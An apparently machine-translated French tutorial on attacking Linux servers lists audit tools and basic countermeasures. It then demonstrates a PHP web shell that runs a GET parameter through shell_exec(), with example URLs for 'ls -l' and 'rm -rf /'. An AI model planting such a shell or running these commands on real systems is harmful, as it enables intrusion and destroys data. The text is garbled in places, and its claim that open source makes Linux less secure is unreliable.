Piratage du système d'exploitation Linux : piratage avec Ubuntu (tutoriel sur les commandes)

Linux est le système d'exploitation serveur le plus utilisé, notamment pour les serveurs Web. C'est open source; cela signifie que n'importe qui peut avoir accès au code source. Cela le rend moins sécurisé par rapport aux autres systèmes d'exploitation, car les attaquants peuvent étudier le code source pour trouver des vulnérabilités.. Linux/Unix for Hackers consiste à exploiter ces vulnérabilités pour obtenir un accès non autorisé à un système.

Dans cet article, nous vous présenterons ce qu'est Linux, ses failles de sécurité, le piratage avec Ubuntu et les contre-mesures que vous pouvez mettre en place.

Note rapide sur Linux

Linux est un système d'exploitation open source. Il existe de nombreuses distributions de systèmes d'exploitation basés sur Linux tels que Redhat, Fedora et Ubuntu, etc. Contrairement à d'autres systèmes d'exploitation, Linux est moins sécurisé en matière de sécurité. En effet, le code source est disponible gratuitement, il est donc facile de l'étudier pour détecter ses vulnérabilités et de les exploiter par rapport à d'autres systèmes d'exploitation qui ne sont pas open source. Linux peut être utilisé comme système d'exploitation pour serveur, ordinateur de bureau, tablette ou appareil mobile.

Les programmes Linux peuvent être exploités à l'aide d'une interface graphique ou de commandes. Les commandes Linux pour Kali Linux le piratage est plus efficace et efficient que l'utilisation de l'interface graphique. Pour cette raison, il est utile de connaître les commandes Linux de base pour le piratage.

Référez-vous à ces tutoriels https://www.guru99.com/unix-linux-tutorial.html sur la façon de démarrer Kali Linux hacks.

Outils de piratage Linux

  • Nessus- cet outil peut être utilisé pour le piratage d'Ubuntu, l'analyse des paramètres de configuration, des correctifs et des réseaux, etc. https://www.tenable.com/products/nessus
  • NMap. Cet outil peut être utilisé pour surveiller les hôtes qui s'exécutent sur le serveur et les services qu'ils utilisent. Il peut également être utilisé pour rechercher des ports. On peut le trouver à https://nmap.org/
  • SAR – SARA est l'acronyme de Security Auditor's Research Assistant. Comme son nom l'indique, cet outil peut être utilisé pour auditer les réseaux contre des menaces telles que Injection SQL, XSS etc., il peut être trouvé sur http://www-arc.com/sara/sara.html

La liste ci-dessus n'est pas exhaustive ; cela vous donne une idée des outils disponibles pour le piratage d'Ubuntu et le piratage des systèmes Linux.

Comment empêcher les piratages Linux

Linux Hacking profite des vulnérabilités du système d'exploitation. Une organisation peut adopter le suivantwing politique pour se protéger contre de telles attaques.

  • Gestion des correctifs– les correctifs corrigent les bugs que les attaquants exploitent pour compromettre un système. Une bonne politique de gestion des correctifs garantira que vous appliquerez constamment les correctifs pertinents à votre système.
  • Configuration correcte du système d'exploitation– d'autres exploits profitent des faiblesses de la configuration du serveur. Les noms d'utilisateurs et démons inactifs doivent être désactivés. Les paramètres par défaut tels que les mots de passe communs à l'application, les noms d'utilisateur par défaut et certains numéros de port doivent être modifiés.
  • Système de détection d'intrusion– ces outils peuvent être utilisés pour détecter un accès non autorisé au système. Certains outils ont la capacité de détecter et de prévenir de telles attaques.

Activité de piratage : pirater un système Linux Ubuntu à l'aide de PHP

Dans ce scénario pratique, nous apprendrons comment pirater avec Ubuntu et nous vous fournirons des informations de base sur la façon dont vous pouvez utiliser PHP compromettre un Linux. Nous n’allons cibler aucune victime. Si vous souhaitez l'essayer, vous pouvez installer LAMPP sur votre ordinateur local.

PHP est livré avec deux fonctions qui peuvent être utilisées pour exécuter des commandes de piratage Linux. Il possède les fonctions exec() et shell_exec(). La fonction exec() renvoie la dernière ligne de la sortie de la commande tandis que shell_exec() renvoie le résultat complet de la commande sous forme de chaîne.

À des fins de démonstration, supposons que les responsables de l'attaquant téléchargent le fichier suivant.wing fichier sur un serveur Web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ICI,

Le script ci-dessus obtient la commande de la variable GET nommée cmd. La commande est exécutée à l'aide de shell_exec() et les résultats sont renvoyés dans le navigateur.

Le code ci-dessus peut être exploité en utilisant la méthode suivantewing URL

http://localhost/cp/konsole.php?cmd=ls%20-l

ICI,

  • «…konsole.php?cmd=ls%20-l»attribue la valeur ls –l à la variable cmd.

La commande dans Ubuntu pour pirater le serveur sera exécutée comme

shell_exec('ls -l') ;

L'exécution du code ci-dessus sur un serveur Web donne des résultats similaires à ceux suivantswing.

Pirater un système Ubuntu Linux en utilisant PHP

La commande ci-dessus affiche simplement les fichiers du répertoire courant et les autorisations

Supposons que l'attaquant réussisse le suiviwing commander

rm -rf /

ICI,

  • "rm" supprime les fichiers
  • « rf » exécute la commande rm en mode récursif. Suppression de tous les dossiers et fichiers
  • "/" demande à la commande de commencer à supprimer les fichiers du répertoire racine

L'URL de l'attaque ressemblerait à ceci

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Résumé

  • Linux est un système d'exploitation populaire pour les serveurs, les ordinateurs de bureau, les tablettes et les appareils mobiles.
  • Linux/Unix est open source et le code source peut être obtenu par n'importe qui. Cela permet de repérer facilement les vulnérabilités. C'est l'un des meilleurs systèmes d'exploitation pour les pirates.
  • Les commandes de piratage de base et de réseau dans Ubuntu sont précieuses pour les pirates Linux.
  • Les vulnérabilités sont une faiblesse qui peut être exploitée pour compromettre un système.
  • Une bonne sécurité peut aider à protéger un système contre toute compromission par un attaquant.
Guru99 est sponsorisé par Invicti
invicti

Invicti, les développeurs de la technologie Proof Based Scanning, ont parrainé le projet Guru99 pour contribuer à sensibiliser à la sécurité des applications Web et permettre à davantage de développeurs d'apprendre à écrire du code sécurisé.